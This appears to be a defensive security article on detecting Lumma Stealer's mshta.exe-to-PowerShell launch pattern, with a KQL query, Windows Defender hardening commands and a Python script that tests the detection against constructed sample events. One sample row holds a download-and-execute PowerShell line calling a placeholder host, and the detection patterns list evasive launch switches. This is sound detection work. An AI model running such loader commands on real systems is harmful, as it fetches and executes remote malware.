Detecting Suspicious Lumma Stealer Behavior with KQL


In this article, we look at how to detect suspicious Lumma Stealer behavior with Kusto Query Language (KQL) in Microsoft Defender for Endpoint advanced hunting. The focus is on PowerShell launched by mshta.exe, a signed Windows binary that executes HTA and script content, and a common living-off-the-land technique used by attackers to start a payload download.

KQL Query for Detection

[kql]
DeviceProcessEvents
| where FileName == "powershell.exe"
| where InitiatingProcessFileName == "mshta.exe"
| where ProcessCommandLine has_any ("-windowstyle hidden", "-w hidden", "-executionpolicy bypass", "-ep bypass", "-noprofile", "-nop")
[/kql]

Key Indicators

  • FileName: `powershell.exe` (the child process). Note that `==` is case-sensitive in KQL; use `=~` if your telemetry is not normalised to lowercase, and consider adding `pwsh.exe` for PowerShell 7.
  • InitiatingProcessFileName: `mshta.exe` (the parent that spawned PowerShell).
  • ProcessCommandLine: includes launch options that hide the window, bypass the execution policy or skip profile loading, such as `-windowstyle hidden`, `-executionpolicy bypass` and `-noprofile`. `has_any` matches whole terms, which is why the short forms `-w`, `-ep` and `-nop` are listed separately; other abbreviations PowerShell accepts (for example `-wi` or `-exec`) are not covered by this list.

Practical Commands for Detection

1. Monitor PowerShell Script Block Logs:

Event ID 4104 records the script content PowerShell runs (Script Block Logging must be enabled first). The filter below finds scripts that reference mshta.exe; it does not show the parent-child relationship itself. For that, use Security Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1, and check the parent process field.

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} | Where-Object { $_.Message -match 'mshta\.exe' }

2. Restrict the script engines `mshta.exe` relies on with ASR:

There is no ASR rule that blocks mshta.exe itself (use AppLocker or WDAC for that). The ASR rule "Block JavaScript or VBScript from launching downloaded executable content" (d3e037e1-3eb8-44c8-a917-57927947596d) limits what HTA-hosted script can launch. Use Add-MpPreference rather than Set-MpPreference so rules already configured are kept, and roll out in AuditMode before switching to Enabled.

Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules_Actions Enabled

3. Enable Controlled Folder Access:

This is a separate Defender feature (ransomware protection for listed folders), not an ASR rule; ASR rules are enabled individually as in step 2.

Set-MpPreference -EnableControlledFolderAccess Enabled

What Undercode Say

In the ever-evolving landscape of cybersecurity, detecting and mitigating threats like Lumma Stealer requires a proactive approach. By leveraging KQL queries, we can identify suspicious PowerShell activity initiated by mshta.exe, a common vector for malware delivery. The provided KQL query focuses on specific command-line arguments that are often used to evade notice, such as `-windowstyle hidden` and `-executionpolicy bypass`.

To enhance your defenses, consider implementing the following practices:
– Baseline Normal Behavior: Regularly baseline normal system behavior to identify anomalies. For example, enable Script Block Logging and monitor Event ID 4104 for the content of scripts that run, so that legitimate mshta.exe or PowerShell use by admin tooling is known before alerting on it.
– Block Suspicious Executables: Use Microsoft Defender's Attack Surface Reduction (ASR) rules to limit what script engines can launch, and AppLocker or WDAC to block `mshta.exe` and other high-risk executables outright where they are not needed.
– Adaptive Detection: Continuously update your detection rules to account for new obfuscation techniques. PowerShell accepts any unambiguous prefix of a parameter name, so `-ep`, `-exec` and `-executionpolicy` are all the same switch; either enumerate the spellings in `has_any` or normalise the command line before matching.
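The detection logic of the page's KQL query, run offline over constructed sample rows in the shape of DeviceProcessEvents, as an added Python example (this is not the page's query and not Lumma-specific tooling). It transcribes the query literally, including KQL's case-sensitive `==` and an approximation of `has_any`, and contrasts it with a version that expands PowerShell's abbreviated switches the way the console host parser does, so `-wi hidden` or `-exec bypass` still resolve to the same indicators. The switch table (full name and shortest accepted prefix) is my reading of the documented powershell.exe short forms, and the sample events are constructed, not real telemetry; verify both against your own build and data.

```python
import re

# Model of how powershell.exe resolves abbreviated switches: a switch matches a
# parameter when it is a case-insensitive prefix of the full name and at least as
# long as the shortest documented form. Assumption: table follows the documented
# short forms for powershell.exe (-w, -ex/-ep, -nop, -noni, -nol, -e/-ec, -c, -f).
SWITCHES = {  # full name -> shortest accepted prefix
    "windowstyle": "w",
    "executionpolicy": "ex",
    "noprofile": "nop",
    "noninteractive": "noni",
    "nologo": "nol",
    "encodedcommand": "e",
    "command": "c",
    "file": "f",
}
ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}  # documented extra short forms

TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # split a Windows command line, keeping quoted args whole

# The literal term list from the page's has_any clause.
PAGE_TERMS = ["-windowstyle hidden", "-w hidden", "-executionpolicy bypass",
              "-ep bypass", "-noprofile", "-nop"]


def normalize_switch(token):
    """Return the canonical parameter name for a switch token, or None if it is not a switch."""
    if not token or token[0] not in "-/":
        return None
    key = token.lstrip("-/").lower()
    if key in ALIASES:
        return ALIASES[key]
    for full, shortest in SWITCHES.items():
        if full.startswith(key) and len(key) >= len(shortest):
            return full
    return None  # unknown, or too short to be unambiguous (e.g. "-no")


def extract_indicators(cmdline):
    """Return the set of suspicious launch options in a PowerShell command line."""
    tokens = TOKEN_RE.findall(cmdline)
    found = set()
    for i, tok in enumerate(tokens):
        name = normalize_switch(tok)
        value = tokens[i + 1].strip('"').lower() if i + 1 < len(tokens) else ""
        if name == "windowstyle" and value == "hidden":
            found.add("windowstyle hidden")
        elif name == "executionpolicy" and value == "bypass":
            found.add("executionpolicy bypass")
        elif name == "noprofile":
            found.add("noprofile")
        elif name == "encodedcommand":
            found.add("encodedcommand")  # not in the page's list, added here as a common loader trait
    return found


def has_any(text, terms):
    """Approximation of KQL has_any: case-insensitive phrase match on term boundaries,
    so "-nop" does not match inside "-noprofile" (KQL tokenises the same way)."""
    low = text.lower()
    return any(re.search(r"(?<![a-z0-9])" + re.escape(t) + r"(?![a-z0-9])", low)
               for t in terms)


def page_rule(event):
    """Literal transcription of the page's KQL: == is case-sensitive, has_any on a fixed list."""
    return (event["FileName"] == "powershell.exe"
            and event["InitiatingProcessFileName"] == "mshta.exe"
            and has_any(event["ProcessCommandLine"], PAGE_TERMS))


def detect(event):
    """Same rule with =~ semantics and switch normalisation; also covers pwsh.exe."""
    if event["FileName"].lower() not in ("powershell.exe", "pwsh.exe"):
        return set()
    if event["InitiatingProcessFileName"].lower() != "mshta.exe":
        return set()
    return extract_indicators(event["ProcessCommandLine"])


def compare(events):
    """For each event: (page rule hit?, indicators found by the normalising rule)."""
    return [(page_rule(e), sorted(detect(e))) for e in events]


# Constructed sample rows in DeviceProcessEvents shape (not real telemetry).
SAMPLE_EVENTS = [
    {"FileName": "powershell.exe", "InitiatingProcessFileName": "mshta.exe",
     "ProcessCommandLine": 'powershell.exe -w hidden -ep bypass -nop -c "iex (iwr http://example.invalid/x)"'},
    {"FileName": "PowerShell.exe", "InitiatingProcessFileName": "MSHTA.EXE",  # mixed case: == misses it
     "ProcessCommandLine": "PowerShell.exe -WindowStyle Hidden -NoProfile -File C:\\Users\\Public\\u.ps1"},
    {"FileName": "powershell.exe", "InitiatingProcessFileName": "mshta.exe",  # prefixes not in has_any list
     "ProcessCommandLine": "powershell.exe -wi hidden -exec bypass -nopr -e SQBFAFgA"},
    {"FileName": "powershell.exe", "InitiatingProcessFileName": "explorer.exe",  # wrong parent
     "ProcessCommandLine": "powershell.exe -nop -w hidden -c Get-Date"},
    {"FileName": "powershell.exe", "InitiatingProcessFileName": "mshta.exe",  # benign options
     "ProcessCommandLine": "powershell.exe -Command Get-Process"},
]

if __name__ == "__main__":
    for event, (hit, found) in zip(SAMPLE_EVENTS, compare(SAMPLE_EVENTS)):
        print(f"page_rule={hit!s:5} normalised={found}  <- {event['ProcessCommandLine']}")
```

Rows two and three are the ones worth studying: the literal transcription misses the mixed-case file names and the `-wi`/`-exec`/`-nopr` spellings, while the normalising version reports the same indicators for every spelling. In the real query, switching `==` to `=~` fixes the first gap; the second needs either a longer `has_any` list or a regex such as `matches regex @"(?i)-w(i(n(d(o(w(s(t(y(l(e)?)?)?)?)?)?)?)?)?)?\s+hidden"`, which is where a normaliser like the one above is easier to reason about.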

Additionally, integrating threat intelligence feeds and automating response actions can significantly reduce the time to detect and respond to such threats. For further reading on PowerShell obfuscation techniques, refer to Microsoft’s documentation on PowerShell security.

By combining these strategies, you can build a robust defense mechanism against advanced threats like Lumma Stealer, ensuring your systems remain secure in an increasingly hostile digital environment.
